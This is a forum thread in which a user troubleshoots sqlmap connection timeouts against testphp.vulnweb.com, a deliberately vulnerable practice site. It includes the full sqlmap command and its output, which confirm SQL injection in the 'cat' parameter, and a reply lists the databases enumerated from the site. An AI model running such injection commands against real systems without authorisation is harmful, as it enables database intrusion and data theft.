SqlMap critical error

Discussion in 'Exploitation' started by Malisa, Apr 24, 2014.

  1. Malisa

    Malisa New Member

    Joined:
    Apr 24, 2014
    Messages:
    2
    Likes Received:
    0
    I'm having a problem with sqlmap in Kali Linux. I always get this critical error: [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

    I tried increasing the timeout to 100 and using --flush-session, but nothing changed; I always get the same error many times for all the vulnerable URLs I tried. Do you know what it is?

    Here is one example:

    root@root:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 03:31:08

    [03:31:09] [INFO] testing connection to the target URL
    [03:31:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
    [03:31:13] [INFO] target URL is stable
    [03:31:13] [INFO] testing if GET parameter 'cat' is dynamic
    [03:31:17] [INFO] confirming that GET parameter 'cat' is dynamic
    [03:31:17] [INFO] GET parameter 'cat' is dynamic
    [03:31:17] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be injectable (possible DBMS: 'MySQL')
    [03:31:17] [INFO] testing for SQL injection on GET parameter 'cat'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
    [03:31:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [03:31:33] [WARNING] reflective value(s) found and filtering out
    [03:31:34] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [03:31:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [03:31:35] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [03:31:35] [INFO] testing 'MySQL inline queries'
    [03:31:35] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [03:31:35] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
    [03:31:36] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
    [03:31:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [03:31:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [03:32:36] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' injectable
    [03:32:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [03:32:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
    [03:32:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [03:32:38] [INFO] target URL appears to have 11 columns in query
    [03:33:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
    [03:33:08] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
    [03:33:39] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
     
    #1
  2. jonagold

    jonagold New Member

    Joined:
    Dec 29, 2013
    Messages:
    22
    Likes Received:
    0
    Works OK for me:
    available databases [2]:
    [*] acuart
    [*] information_schem
     
    #2
  3. Malisa

    Malisa New Member

    Joined:
    Apr 24, 2014
    Messages:
    2
    Likes Received:
    0
    I did not solve this problem, but when I tried with the live version of Kali Linux in VirtualBox, it worked just fine; I got the databases like you did.
    But on the installed version of Kali Linux and on Web Security Dojo I always get this error.
     
    #3
  4. rawstring

    rawstring Staff Member

    Joined:
    Apr 4, 2013
    Messages:
    362
    Likes Received:
    50
    Worked fine for me too
     
    #4